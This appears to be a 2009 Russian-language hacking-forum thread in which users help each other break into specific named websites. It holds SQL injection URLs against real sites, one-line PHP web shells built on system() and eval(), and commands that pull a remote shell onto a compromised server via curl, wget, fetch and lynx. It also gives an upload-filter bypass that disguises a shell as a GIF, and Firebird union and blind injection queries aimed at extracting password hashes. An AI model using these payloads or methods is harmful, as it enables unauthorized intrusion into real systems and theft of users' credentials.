10.02.2009, 04:56
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
http://www.org-tech.ru/view.php?id=50990+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45&cat=1
|
|
|
10.02.2009, 09:45
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
С нами:
9295494
Репутация:
1
|
|
ну вот ребят, есть метод чтобы залить шелл через битбукет без инклуда... ну вот и способ:
простой r57 переименовать в такое название:
myshell.php._gif  этого файла будет читать как пхп файл
в многих случиаях надо открыть шелл и прописать в начяле GIF89a для того чтобы bitbucket определил его как фотку .gif |
|
|
|
10.02.2009, 09:58
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
С нами:
9295494
Репутация:
1
|
|
есть пару вапросов:
1) вот я залил один файл в каторым ноходица
Код:
<? system($_GET[c]) ?>
я пробавал залить шелл через этот варянт таким путём:
Код:
curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php
но не залился...  может есть какие нибудь команды чтобы ишё как нибудь залить шелл? или проста скачять все файлы каторые есть в DOCUMENT_ROOT ???
2) я нашол одну дыру в одном сайте, пасматрел в моём кампе у меня есть такой же файл... ну вот и сам файл:
Код:
$requestid = $_GET["requestid"];
$res = mysql_query("SELECT userid, filledby FROM requests WHERE id =$requestid") or sqlerr();
$arr = mysql_fetch_assoc($res);
if (($CURUSER[id] == $arr[userid]) || (get_user_class() >= 4) || ($CURUSER[id] == $arr[filledby]))
{
@mysql_query("UPDATE requests SET filled='', filledby=0 WHERE id =$requestid") or sqlerr();
print("Request $requestid successfully reset.");
}
else
print("Sorry, cannot reset a request when you are not the owner");
делаю запрос на том сайте:
Код:
reqreset.php?requestid=-1'+union+select+passhash+from+users+--+
передомной ошибка в sql:
Код:
SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' passhash from users --' at line 1
помойму тамо сидит фильтр на кавачикй... |
|
|
|
10.02.2009, 20:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
downloader,
1. это nix? which wget GET curl lynx ? попробуй через аплоад:
<form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>
2. ковычка там не нужна и колонки в запросе две
Gorev, обе переменные участвуют в нескольких запросах поэтому связка с union там врятли прокатит, вообще говоря, т.к. колонка в одном из запросов одна выглядело бы примерно так -1+union+select+cast(user+as+char(n))+from+rdb$user _privileges/* причем тип данных (as char/int/etc(n)) должен совпадать с изначальным в первой выборке, если посимвольным брутом надо покапаться в мануалах найти функцию которая работает с выражениями/строками, особо не вдавался в этот вопрос
/add посмотрел пока писал сообщение посимвольно будет выглядеть примерно так:
+and+substring((select+rdb$user+from+rdb$user_priv ileges+здесь_какой_нибудь_подд ерживаемый_лимит(например rows))+from+1+for+0)='a'/*
все с точностью прочитанного нескольками минутами назад мануала, надо бы поставить, посмотреть может наврал где-то 
|
|
|
|
10.02.2009, 22:31
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
С нами:
9295494
Репутация:
1
|
|
Сообщение от l1ght
downloader,
1. это nix? which wget GET curl lynx ? попробуй через аплоад:
Код:
<form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>
freeBSD 6.2
sorry но не понял как делать через аплоад я ещё навичок в этом деле
Последний раз редактировалось downloader; 10.02.2009 в 22:41..
|
|
|
|
10.02.2009, 23:18
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
http://dl.kimep.kz/course/view.php?id=-114
Не могу найти скулю, помогите плз...
|
|
|
|
13.02.2009, 06:48
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от downloader
есть пару вапросов:
1) вот я залил один файл в каторым ноходица
Код:
<? system($_GET[c]) ?>
я пробавал залить шелл через этот варянт таким путём:
Код:
curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php
но не залился... может есть какие нибудь команды чтобы ишё как нибудь залить шелл? или проста скачять все файлы каторые есть в DOCUMENT_ROOT ???
2) я нашол одну дыру в одном сайте, пасматрел в моём кампе у меня есть такой же файл... ну вот и сам файл:
Код:
$requestid = $_GET["requestid"];
$res = mysql_query("SELECT userid, filledby FROM requests WHERE id =$requestid") or sqlerr();
$arr = mysql_fetch_assoc($res);
if (($CURUSER[id] == $arr[userid]) || (get_user_class() >= 4) || ($CURUSER[id] == $arr[filledby]))
{
@mysql_query("UPDATE requests SET filled='', filledby=0 WHERE id =$requestid") or sqlerr();
print("Request $requestid successfully reset.");
}
else
print("Sorry, cannot reset a request when you are not the owner");
делаю запрос на том сайте:
Код:
reqreset.php?requestid=-1'+union+select+passhash+from+users+--+
передомной ошибка в sql:
Код:
SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' passhash from users --' at line 1
помойму тамо сидит фильтр на кавачикй... Не делай никогда system() - это нерациоанально,
делай eval(). system() не всегда работает и если magic quotes on -то ничего ты не сделаешь....
А eval дает гибкость большую - твой код всегда выполинться даже при magic quotes on (правда с финтами некоторыми =) ) Кроме того, всегда можно сделать и так -если хочешь - eval('system();')
в твоем случае делай так - залий аплоадер простенький - <?php eval($_GET[id]);?> и потом юзай так
site.gov/cmd.php?id=copy('http://xakersite.ru/shell.txt','shell.php');
|
|
|
|
10.02.2009, 10:02
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
так как не нашел инфу по поводу моего вопроса , решил обратится к вам
http://www.cmediere.ro/index.php?mid=3&smid=-16'
Interbase...
помогите составить запрос, либо направте по ссылке на нужную информацию.
Сильно не пинать, так как не часто прошу помощи. спасибо
|
|
|
|
10.02.2009, 21:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами:
10139366
Репутация:
1502
|
|
Gorev, ну и ещё - тебе надо умудриться не только подобрать количество колонок в union, но и их типы) ибо из мануала
<...>Firebird is very strict with datatypes, and when you have different datatype in queries that make up the UNION it throws an error. It can happen even if difference is something trivial like CHAR(5) vs CHAR(6). It also happens for decimal and double datatypes, and (one of the most annoying) when you put NULL or zero.
Firebird 2 has much better type coercion as it detects the largest datatype, and allows smaller ones to fit automatically, i.e. if you have CHAR(5) in one query and CHAR(6) in other, it will automatically set view's column to be CHAR(6). Please note that datatypes have to be compatible for this to work (for example, you cannot union a Blob and Decimal column).
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
10.02.2009, 22:13
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://www.np-ats.ru/index.jsp?pid=612'+order+by+1--
Такая же хня,скуля там есть.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
